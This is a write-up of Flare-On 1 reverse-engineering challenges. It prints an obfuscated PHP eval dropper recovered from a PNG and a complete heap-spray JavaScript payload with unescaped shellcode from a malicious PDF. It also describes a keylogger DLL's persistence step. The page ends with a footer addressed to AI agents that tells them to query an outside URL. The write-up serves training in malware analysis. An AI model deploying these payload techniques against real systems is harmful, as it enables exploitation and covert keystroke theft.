# Flare-on 1 ## Link to Lab : ## Q1 .Challenge 1 – Challenge1.exe key? The file was built from .NET 2.0 (based on the mscorlib import). That'll be important later to determine what tool to analyze the file in -> I use `DotPeek` to do this .

Checking the execute the file to see what happened :

Also, it requires downloading .Net[^1] 2.0 or 3.0 if your computer doesn't have it. Continue DotPeek to understand what this challenge file is doing: After looking around , start from main() function and move to this :

Look on the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode\_Click); My suggestion in this case is to look for the method btnDecode\_Click, which displays:

Data might from : `byte[] datSecret = Resources.dat_secret;` -> so will need find this data and do the xor math like that to find the message when decode Data\_secret will import from this file -> so save it to outside this file :

Now , do with basic math step by step from this , because the math in here like Decode -> Encode -> print out to the screen , so we will take first math to decode the data we need :

Solution 2 : Fastest way ( Using Process Hacker ) Running the File Challenge and click button DECODE then open Process Hacker :

Then Open Strings -> Search -> Click Ok

Now we can Filter the Strings -> search key word `flare` contains to look :

And I got the flag :

## Q2. Challenge 2 – flare-on.png key? At this challenge contain 1 file png and html . So let take a look on html

It's like just for description, not contain anything

Now move on .png file

When I open it with HXD, I see some php in here, please take it out and see more clearly :

<?php $terms = [
    "M","Z","]","p","\\","w","f","1","v","<","a","Q","z"," ","s","m","+","E","D","g","W","\"",
    "q","y","T","V","n","S","X",")","9","C","P","r","&","\'","!","x","G",":","2","~","O","h",
    "u","U","@",";","H","3","F","6","b","L",">","^",",",".","l","$","d","`","%","N","*","[",
    "0","}","J","-","5","_","A","=","{","k","o","7","#","i","I","Y","(","j","/","?","K","c","B","t","R","4","8","e","|",];
    
    order = [
    59,71,73,13,35,10,20,81,76,10,28,63,12,1,28,11,76,68,50,30,11,24,7,63,45,20,23,68,87,42,24,60,87,63,18,58,87,63,18,58,87,63,83,43,87,93,18,90,38,28,18,19,66,28,18,17,37,63,58,37,91,63,83,43,87,42,24,
    60,87,93,18,87,66,28,48,19,66,63,50,37,91,63,17,1,87,93,18,45,66,28,48,19,40,11,25,5,70,63,7,37,91,63,12,1,87,93,18,81,37,28,48,19,12,63,25,37,91,63,83,63,87,93,18,87,23,28,18,75,49,28,48,19,49,0,50,37,91,63,18,
    50,87,42,18,90,87,93,18,81,40,28,48,19,40,11,7,5,70,63,7,37,91,63,12,68,87,93,18,81,7,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,18,17,37,0,50,5,40,42,50,5,49,42,25,5,91,63,50,5,70,
    42,25,37,91,63,75,1,87,93,18,1,17,80,58,66,3,86,27,88,77,80,38,25,40,81,20,5,76,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,75,28,7,88,32,45,7,90,52,80,58,5,70,63,7,5,66,42,25,37,91,0,12,50,87,63,83,43,
    87,93,18,90,38,28,48,19,7,63,50,5,37,0,24,1,87,0,24,72,66,28,48,19,40,0,25,5,37,0,24,1,87,93,18,11,66,28,18,87,70,28,48,19,7,63,50,5,37,0,18,1,87,42,24,60,87,0,24,17,91,28,18,75,49,28,18,45,12,28,48,19,40,0,7,5,37,
    0,24,90,87,93,18,81,37,28,48,19,49,0,50,5,40,63,25,5,91,63,50,5,37,0,18,68,87,93,18,1,18,28,48,19,40,0,25,5,37,0,24,90,87,0,24,72,37,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,48,19,40,
    90,25,37,91,63,18,90,87,93,18,90,38,28,18,19,66,28,18,75,70,28,48,19,40,90,58,37,91,63,75,11,79,28,27,75,3,42,23,88,30,35,47,59,71,71,73,35,68,38,63,8,1,38,45,30,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,
    75,28,23,75,77,1,28,1,43,52,31,19,75,81,40,30,75,1,27,75,77,35,47,59,71,71,71,73,21,4,37,51,40,4,7,91,7,4,37,77,49,4,7,91,70,4,37,49,51,4,51,91,4,37,70,6,4,7,91,91,4,37,51,70,4,7,91,49,4,37,51,6,4,7,91,91,4,37,51,70,21,
    47,93,8,10,58,82,59,71,71,71,82,59,71,71,29,29,47,];
$do_me = "";
for ($i = 0; $i < count($order); $i++) {
    $do_me = $do_me . $terms[$order[$i]];
}
eval($do_me); ?>

Fix the code to execute ( eval -> print )

Edit and got this when execute that new code :

Got this :

Let's decode this message, I will use python for this step and I get a nice looking text message

Continue replace DOT,DASH...message to look it more clearly :

## Q3. Challenge 3 – such\_evil.exe key? Take a view about this file type :

It's look file make for windows execute so change to .exe and analyze with that

Open this file with IDA to see what it have :

it call `sub_401000` look interesting and 0×401000 is the beginning of the code section, commonly it is the function had written by user . So let move to it :

Pass hold this and look at the end :

That showing the binary is calling the location of the first byte move on stack -> need handle the shellcode at this point so let set the break point at `call eax` -> set before it calling the shellcode ( need run the program to catch it ) . I will debug this with `x32dbg` :

Set break-point at 0040249B and step into eax

Set break-point and step through this loop :

Also saw the first string used as the decryption key in xor math : `nopasaurus`

Continue step through this loop by setting the break-point over that :

At this xor might look same so we can pass through the math and move it to the `call` instruction to retrive the flag

Got this message :

Follow the `EBX` in hex dump :

`The Second way : ( Using Process Hacker )` Again do the same like the `Challenge 1` : Execute the file then open the Process Hacker -> search for String :

## Q4 . Challenge 4 – APT9001.pdf key? So I have dealt with malicious PDF analysis before (my previous article) so let's move on to REMnux for the best tool for malicious pdf analysis `peepdf` -> dump infomation also in Json format in the pdf file

Next use `extract` with `js` to extract the javascript code contain in file :

``` // peepdf comment: Javascript code located in object 6 (version 0) var HdPN = ""; var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = ""; var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff"); var MPBPtdcBjTlpvyTYkSwgkrWhXL = ""; for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 128; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791"); ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg; OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791"); fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20; fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length < fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY += OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY; UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA); MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length - fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA); while (MOysyGgYplwyZzNdETHwkru.length + fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru + MOysyGgYplwyZzNdETHwkru + UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb; DPwxazRhwbQGu = new Array(); for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 100; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv; for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 142; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166"); bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20 while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf; Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT); QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length - bGtvKT); while (QCZabMzxQiD.length + bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD + QCZabMzxQiD + Juphd; FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array(); for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 125; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf; ``` All above code just have look at `unescape("%u72f9%u.....` because this look like the shellcode -> move on covert this to execute Deofuscate might help view the code for easy to look : ```javascript // peepdf comment: Javascript code located in object 6 (version 0) var string_1 = ""; var string_2 = ""; var string_3 = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff"); var string_4 = ""; for (var_1 = 128; var_1 >= 0; --var_1) string_4 += unescape("%ub32f%u3791"); var_2 = string_4 + IxTUQnOvHg; var_3 = unescape("%ub32f%u3791"); var_4 = 20; string_5 = var_4 + var_2.length while (var_3.length < string_5) var_3 += var_3; string_6 = var_3.substring(0, string_5); string_7 = var_3.substring(0, var_3.length - string_5); while (string_7.length + string_5 < 0x40000) string_7 = string_7 + string_7 + string_6; string_8 = new Array(); for (var_1 = 0; var_1 < 100; var_1++) string_8[var_1] = string_7 + var_2; for (var_1 = 142; var_1 >= 0; --var_1) string_2 += unescape("%ub550%u0166"); string_9 = string_2.length + 20 while (string_2.length < string_9) string_2 += string_2; string_10 = string_2.substring(0, string_9); string_11 = string_2.substring(0, string_2.length - string_9); while (string_11.length + string_9 < 0x40000) string_11 = string_11 + string_11 + string_10; string_12 = new Array(); for (var_1 = 0; var_1 < 125; var_1++) string_12[var_1] = string_11 + string_2; ``` The shellcode need covert is in `string_3` Set var to test this first -> try converting to hex then see this execute first then can move to dynamic analysis

See some message at here :

It's has a tool call `shellcode2exe` to make this code -> executable file Save code to another file

And use `shellcode2exe` with that :

After this i open with IDA to view the code in assembly to know how it doing :

Xor math again, each push value will xor each with with privous so it was easy now : ( Can keep on static by xor each value outside this and decode from hex can get the flag ).

## Q5 . Challenge 5 – 5get\_it.exe key? It's P32 executable again in windows View on Pe-studio :

Can try research start from here then move to IDA decomplie

Start on DLLMain() :

look like the file doing is copies itself to `C:\Windows\System32\svchost.dll`

Moving around i move to this function sub\_10009EB0, i found the loop look very large

Press Space to view as Text -> this help easy to look up so at here found the API `GetAsyncKeyState` which sounds like doing with the keylogger.( or can F5 -> view on pseudocode) I will move to analyze on Flare VM Start from sub\_1001240() which Flare Message print out and catch the key `m`

Use X which is Cross references to show that where dword\_100194FC is set to:

Set 0 in `_cfltcvt_init()` note this function for later, and sub\_10009AF0 and 1 in sub\_10009B60 we have a look at `_cfltcvt_init()` ``` void _cfltcvt_init() { dword_10017000 = 1; dword_10019460 = 0; dword_10019464 = 0; dword_10019468 = 0; dword_1001946C = 0; dword_10019470 = 0; dword_10019474 = 0; dword_10019478 = 0; dword_1001947C = 0; dword_10019480 = 0; dword_10019484 = 0; dword_10019488 = 0; dword_1001948C = 0; dword_10019490 = 0; dword_10019494 = 0; dword_10019498 = 0; dword_1001949C = 0; dword_100194A0 = 0; dword_100194A4 = 0; dword_100194A8 = 0; dword_100194AC = 0; dword_100194B0 = 0; dword_100194B4 = 0; dword_100194B8 = 0; dword_100194BC = 0; dword_100194C0 = 0; dword_100194C4 = 0; dword_100194C8 = 0; dword_100194CC = 0; dword_100194D0 = 0; dword_100194D4 = 0; dword_100194D8 = 0; dword_100194DC = 0; dword_100194E0 = 0; dword_100194E4 = 0; dword_100194E8 = 0; dword_100194EC = 0; dword_100194F0 = 0; dword_100194F4 = 0; dword_100194F8 = 0; dword_100194FC = 0; dword_10019500 = 0; } ``` this like a flow of word so let find where all this set Continue with `dword_100194FC` is set by `o` key :

Okay , let move on to check other until we can know all variable dword in function \_cfltcvt\_init() is set : Right up on this is dword\_100194F8 :

It set to 1 by `c` in sub\_1009850

For faster we can move on function \_cfltcvt\_init then check references each dword

After find all the key set I note it and see this message : ```c void _cfltcvt_init() { dword_10017000 = 1; dword_10019460 = 0; // set by 'l' dword_10019464 = 0; // set by '0' dword_10019468 = 0; // set by 'g' dword_1001946C = 0; // set by 'g' dword_10019470 = 0; // set by 'i' dword_10019474 = 0; // set by 'n' dword_10019478 = 0; // set by 'g' dword_1001947C = 0; // set by 'd' dword_10019480 = 0; // set by 'o' dword_10019484 = 0; // set by 't' dword_10019488 = 0; // set by 'u' dword_1001948C = 0; // set by 'r' dword_10019490 = 0; // set by 'd' dword_10019494 = 0; // set by 'o' dword_10019498 = 0; // set by 't' dword_1001949C = 0; // set by '5' dword_100194A0 = 0; // set by 't' dword_100194A4 = 0; // set by 'r' dword_100194A8 = 0; // set by '0' dword_100194AC = 0; // set by 'k' dword_100194B0 = 0; // set by 'e' dword_100194B4 = 0; // set by '5' dword_100194B8 = 0; // set by 'a' dword_100194BC = 0; // set by 't' dword_100194C0 = 0; // set by 'f' dword_100194C4 = 0; // set by 'l' dword_100194C8 = 0; // set by 'a' dword_100194CC = 0; // set by 'r' dword_100194D0 = 0; // set by 'e' dword_100194D4 = 0; // set by 'd' dword_100194D8 = 0; // set by 'a' dword_100194DC = 0; // set by 's' dword_100194E0 = 0; // set by 'h' dword_100194E4 = 0; // set by 'o' dword_100194E8 = 0; // set by 'n' dword_100194EC = 0; // set by 'd' dword_100194F0 = 0; // set by 'o' dword_100194F4 = 0; // set by 't' dword_100194F8 = 0; // set by 'c' dword_100194FC = 0; // set by 'o' dword_10019500 = 0; } ``` ```c l0ggingdoturdot5tr0ke5atflaredashondotco ``` Transfer it and got the flag :( note that need fill letter m at the end )

## Challenge 6 – e7bc5d2c0cf4480348f5504196561297 key? [^1]: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kayiyan.gitbook.io/hacking-note/cyber-defenders/flare-on-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.